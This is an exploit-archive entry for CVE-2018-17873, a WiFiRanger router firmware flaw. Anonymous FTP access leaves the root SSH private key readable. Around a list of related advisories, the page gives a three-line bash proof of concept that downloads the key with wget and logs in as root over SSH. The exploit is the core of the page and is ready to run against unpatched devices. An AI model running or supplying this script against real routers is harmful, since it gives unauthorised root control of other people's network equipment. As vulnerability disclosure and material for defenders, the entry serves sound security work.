WiFiRanger 7.0.8rc3 Incorrect Access Control / Privilege Escalation

🗓️ 19 Oct 2018 00:00:00Reported by Mitchel JordanType

packetstorm🔗 packetstormsecurity.com👁 134 Views

WiFiRanger 7.0.8rc3 Incorrect Access Contro

Reporter	Title	Published	Views	Family All 8
0day.today	WiFiRanger 7.0.8rc3 Incorrect Access Control / Privilege Escalation Vulnerability	22 Oct 201800:00	–	zdt
BDU FSTEC	The vulnerability of the WiFiRanger router’s microprogramming software, related to key management errors, allows a hacker to obtain access to the SSH key and gain root account access to the system.	23 Dec 201900:00	–	bdu_fstec
CVE	CVE-2018-17873	23 Oct 201821:00	–	cve
Cvelist	CVE-2018-17873	23 Oct 201821:00	–	cvelist
EUVD	EUVD-2018-9615	7 Oct 202500:30	–	euvd
NVD	CVE-2018-17873	23 Oct 201821:30	–	nvd
OSV	CVE-2018-17873	23 Oct 201821:30	–	osv
Prion	Improper access control	23 Oct 201821:30	–	prion

`# Exploit Title: WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation (POC)  
# Exploit Author: Mitchel Jordan  
# Date: 2018-10-18  
# Vendor Homepage: https://wifiranger.com/  
# Firmware: Phantom 7.0.8rc3  
# CVE: CVE-2018-17873  
  
# Details:  
# WiFiRanger indoor routers (Core, GoAC) and their outdoor paired routers (Sky Pro, EliteAC, EliteAC FM) running   
# firmware version 7.0.8rc3 and earlier allow anonymous FTP read/write access and have left the SSH Private Key  
# in the clear - making it a trivial task to view/copy the key and log in with root privileges.  
#  
# Adjacent network access required to exploit this vulnerability.  
  
# Exploit:  
# Extremely simple shell script that grabs the private key and logs in as root.  
#  
# Usage: ./wifiRangerPwn.sh <WiFiRanger IP>  
  
#!/bin/bash  
  
wget "ftp://$1/sbc/aff/id_rsa"  
chmod 600 id_rsa  
ssh -i id_rsa root@$1  
`

19 Oct 2018 00:00Current

1.4Low risk

Vulners AI Score1.4

EPSS0.01853